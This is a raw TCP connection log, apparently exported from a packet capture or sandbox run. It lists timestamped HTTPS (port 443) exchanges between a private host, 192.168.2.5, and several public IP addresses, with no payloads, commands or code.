Nov 25, 2024 11:34:27.733848095 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.737538099 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.737551928 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.737601995 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.737607002 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.738676071 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.744424105 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.744437933 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.744488955 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.744508028 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.745707035 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.750988007 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.751002073 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.751049042 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.751069069 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.751291037 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.757975101 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.757994890 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.758081913 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.758101940 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.758162022 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.764132977 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.764147997 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.764190912 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.764210939 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.766071081 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.874730110 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.877995014 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.878083944 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.879090071 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.879106045 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.879115105 CET	50022	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.879122019 CET	443	50022	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.882420063 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.882460117 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.883074045 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.883209944 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:27.883219957 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:27.909712076 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.909735918 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.909815073 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.909842014 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.910120010 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.915908098 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.915924072 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.915998936 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.916003942 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.916049957 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.922887087 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.922900915 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.922970057 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.922976017 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.926326990 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.929769993 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.929785013 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.929851055 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.929857016 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.930093050 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.936892033 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.936913013 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.936969042 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.936975956 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.937000036 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.937016010 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.943576097 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.943589926 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.943661928 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.943669081 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.946315050 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.950386047 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.950400114 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.950463057 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.950469971 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.954368114 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.956603050 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.956615925 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.956672907 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.956681013 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:27.956696033 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:27.956717968 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.102180004 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.102205992 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.102309942 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.102346897 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.102385044 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.108278990 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.108295918 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.108366966 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.108392954 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.108436108 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.115183115 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.115199089 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.115258932 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.115266085 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.115302086 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.121253014 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.121293068 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.121320963 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.121326923 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.121346951 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.121368885 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.121387959 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.127948999 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.144556999 CET	50008	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:28.144583941 CET	443	50008	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:28.146013021 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.146034956 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.146583080 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.146883011 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.146971941 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.147046089 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.191333055 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.425219059 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.425281048 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.425357103 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.425371885 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:28.425395966 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.425415993 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:28.425913095 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:28.425930023 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.425947905 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:28.426260948 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.426356077 CET	443	50023	20.190.147.1	192.168.2.5
Nov 25, 2024 11:34:28.426412106 CET	50023	443	192.168.2.5	20.190.147.1
Nov 25, 2024 11:34:28.578608036 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.578638077 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.578691006 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.578715086 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.578731060 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.578769922 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.582590103 CET	50024	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.582607985 CET	443	50024	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.590245962 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.590280056 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:28.590334892 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.590601921 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:28.590615034 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.045631886 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:29.045679092 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:29.045840025 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:29.045978069 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:29.045990944 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:29.155471087 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.155993938 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.156008959 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.156543016 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.156547070 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.182574034 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.183042049 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.183068037 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.184118032 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.184129000 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.319257021 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.319832087 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.319858074 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.320321083 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.320327044 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.369551897 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.369995117 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.370006084 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.370430946 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.370434999 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.589730024 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.593077898 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.596137047 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.596174002 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.596194029 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.596261024 CET	50025	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.596267939 CET	443	50025	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.598784924 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.598814964 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.598961115 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.599107981 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.599121094 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.618161917 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.621191025 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.621254921 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.621289015 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.621295929 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.621305943 CET	50026	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.621309996 CET	443	50026	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.624284029 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.624304056 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.624386072 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.624600887 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.624614000 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.728496075 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.729031086 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.729048967 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.729496956 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.729502916 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.754967928 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.758116007 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.758164883 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.760071993 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.760132074 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.760150909 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.760166883 CET	50028	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.760171890 CET	443	50028	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.762991905 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.763031960 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.763123035 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.763284922 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.763295889 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.814897060 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.814920902 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.815298080 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.815305948 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.815548897 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.815548897 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.815557003 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.815704107 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.815732956 CET	443	50027	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.815792084 CET	50027	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.818439960 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.818473101 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.818583965 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.818746090 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:29.818757057 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:29.892945051 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.894275904 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:29.894289970 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.894618988 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.895247936 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:29.895247936 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:29.895261049 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.895308018 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:29.946136951 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.181763887 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.181807995 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.181849957 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.181864977 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.181909084 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.198510885 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.198539019 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.198539972 CET	50029	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.198559999 CET	443	50029	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.228048086 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.228075981 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.228157043 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.276134014 CET	50036	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:30.276154041 CET	443	50036	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:30.335825920 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.335921049 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.335979939 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:30.362549067 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362586975 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362595081 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362610102 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362658978 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.362677097 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362692118 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.362726927 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.362786055 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.368534088 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.368750095 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.368818045 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:30.371109009 CET	50030	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.371140957 CET	443	50030	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.377831936 CET	49945	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:30.377847910 CET	443	49945	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.377856016 CET	49946	443	192.168.2.5	23.209.72.7
Nov 25, 2024 11:34:30.377883911 CET	443	49946	23.209.72.7	192.168.2.5
Nov 25, 2024 11:34:30.378215075 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.378237009 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.378318071 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.378597975 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:30.378613949 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:30.467021942 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.467068911 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:30.467149019 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.467371941 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.467384100 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:30.486299038 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:30.486394882 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.486792088 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.486805916 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:30.488333941 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.488333941 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:30.488344908 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:30.488358021 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.402656078 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.406754017 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.406779051 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.407250881 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.407255888 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.445245028 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.446621895 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.446636915 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.447089911 CET	50032	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.447096109 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.554514885 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.555565119 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.555581093 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.556555986 CET	50034	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.556562901 CET	443	50034	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.604176998 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.604650021 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.604662895 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.605087996 CET	50035	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.605093002 CET	443	50035	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.609153032 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.609215975 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.609220982 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.609256029 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.610217094 CET	50031	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.610238075 CET	443	50031	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.637438059 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:31.637873888 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:31.637885094 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:31.638200998 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:31.638525963 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:31.638593912 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:31.638670921 CET	50037	443	192.168.2.5	104.117.182.56
Nov 25, 2024 11:34:31.683321953 CET	443	50037	104.117.182.56	192.168.2.5
Nov 25, 2024 11:34:31.845926046 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849210024 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849272966 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.849306107 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849344015 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849394083 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.849416018 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849426985 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.849433899 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.849451065 CET	50033	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.849455118 CET	443	50033	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.852428913 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.852466106 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.852556944 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.852699995 CET	50039	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:31.852715969 CET	443	50039	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.868417025 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.868504047 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.868911028 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.868928909 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.870630026 CET	50038	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:34:31.870635986 CET	443	50038	49.13.32.95	192.168.2.5
Nov 25, 2024 11:34:31.898056030 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.901215076 CET	443	50032	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:31.901266098 CET	50032	443	192.168.2.5	13.107.246.63
